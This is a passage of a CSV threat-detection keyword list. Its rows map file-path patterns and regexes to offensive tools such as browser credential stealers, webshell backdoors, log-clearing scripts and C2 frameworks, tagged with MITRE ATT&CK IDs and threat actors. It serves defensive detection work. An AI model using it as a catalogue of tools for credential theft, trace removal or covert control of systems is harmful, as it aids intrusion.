"*/chrome_creditcard.csv*",".{0,1000}\/chrome_creditcard\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6023"
"*/chrome_creditcard.json*",".{0,1000}\/chrome_creditcard\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6024"
"*/chrome_decrypt.exe*",".{0,1000}\/chrome_decrypt\.exe.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","1","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","6025"
"*/chrome_decrypt.py*",".{0,1000}\/chrome_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6026"
"*/chrome_password.csv*",".{0,1000}\/chrome_password\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6027"
"*/chrome_password.json*",".{0,1000}\/chrome_password\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6028"
"*/Chrome-App-Bound-Encryption-Decryption.git*",".{0,1000}\/Chrome\-App\-Bound\-Encryption\-Decryption\.git.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","1","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","6029"
"*/ChromeDump.ahk*",".{0,1000}\/ChromeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6030"
"*/ChromeDump/*",".{0,1000}\/ChromeDump\/.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","6031"
"*/ChromeKatz.git*",".{0,1000}\/ChromeKatz\.git.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","6032"
"*/chromepasswordlist.csv*",".{0,1000}\/chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","6033"
"*/chromepasswords.py*",".{0,1000}\/chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","6034"
"*/ChromeStealer.git*",".{0,1000}\/ChromeStealer\.git.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","1","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","6035"
"*/chromium_based_browsers.py*",".{0,1000}\/chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","6036"
"*/chromium_history.py*",".{0,1000}\/chromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6037"
"*/chromium_logins.py*",".{0,1000}\/chromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6038"
"*/Chunk-Proxy.git*",".{0,1000}\/Chunk\-Proxy\.git.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","6039"
"*/ChunkProxyHandler.class*",".{0,1000}\/ChunkProxyHandler\.class.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#content","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","6040"
"*/cics-enum.nse*",".{0,1000}\/cics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6041"
"*/cics-info.nse*",".{0,1000}\/cics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6042"
"*/cics-user-brute.nse*",".{0,1000}\/cics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6043"
"*/cics-user-enum.nse*",".{0,1000}\/cics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6044"
"*/CIMplant.exe*",".{0,1000}\/CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","6045"
"*/CIMplant.git*",".{0,1000}\/CIMplant\.git.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","6046"
"*/CIMplant/Commander.cs*",".{0,1000}\/CIMplant\/Commander\.cs.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","6047"
"*/citrix-brute-xml.nse*",".{0,1000}\/citrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6048"
"*/citrix-enum-apps.nse*",".{0,1000}\/citrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6049"
"*/citrix-enum-apps-xml.nse*",".{0,1000}\/citrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6050"
"*/citrix-enum-servers.nse*",".{0,1000}\/citrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6051"
"*/citrix-enum-servers-xml.nse*",".{0,1000}\/citrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6052"
"*/clamav-exec.nse*",".{0,1000}\/clamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6053"
"*/cleanRDP.bat*",".{0,1000}\/cleanRDP\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","CleanRDP.bat script erasing RDP traces used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6054"
"*/cleantracks.ps1",".{0,1000}\/cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","6055"
"*/clear_logs.py*",".{0,1000}\/clear_logs\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6056"
"*/ClearnEventRecordID.ps1*",".{0,1000}\/ClearnEventRecordID\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6057"
"*/ClearnIpAddress.ps1*",".{0,1000}\/ClearnIpAddress\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6058"
"*/ClearnTempLog.ps1*",".{0,1000}\/ClearnTempLog\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6059"
"*/clfs_eop.exe*",".{0,1000}\/clfs_eop\.exe.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","1","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","6060"
"*/ClickJack.exe",".{0,1000}\/ClickJack\.exe","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6061"
"*/clickme.docx*",".{0,1000}\/clickme\.docx.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","N/A","2","104","27","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z","6062"
"*/client/beef.js*",".{0,1000}\/client\/beef\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","6063"
"*/client/bof/*.asm*",".{0,1000}\/client\/bof\/.{0,1000}\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","6064"
"*/Client/Commands/Enumeration.yaml*",".{0,1000}\/Client\/Commands\/Enumeration\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6065"
"*/Client/Commands/Execution.yaml*",".{0,1000}\/Client\/Commands\/Execution\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6066"
"*/Client/Commands/Injection.yaml*",".{0,1000}\/Client\/Commands\/Injection\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6067"
"*/Client/Commands/Lateral.yaml*",".{0,1000}\/Client\/Commands\/Lateral\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6068"
"*/Client/Commands/Tokens.yaml*",".{0,1000}\/Client\/Commands\/Tokens\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6069"
"*/client/generated-stagers/*",".{0,1000}\/client\/generated\-stagers\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6070"
"*/Client/Pages/Drones.razor*",".{0,1000}\/Client\/Pages\/Drones\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6071"
"*/Client/Pages/Payloads.razor*",".{0,1000}\/Client\/Pages\/Payloads\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6072"
"*/Client/Pages/Pivots.razor*",".{0,1000}\/Client\/Pages\/Pivots\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6073"
"*/clipboardinject.*",".{0,1000}\/clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 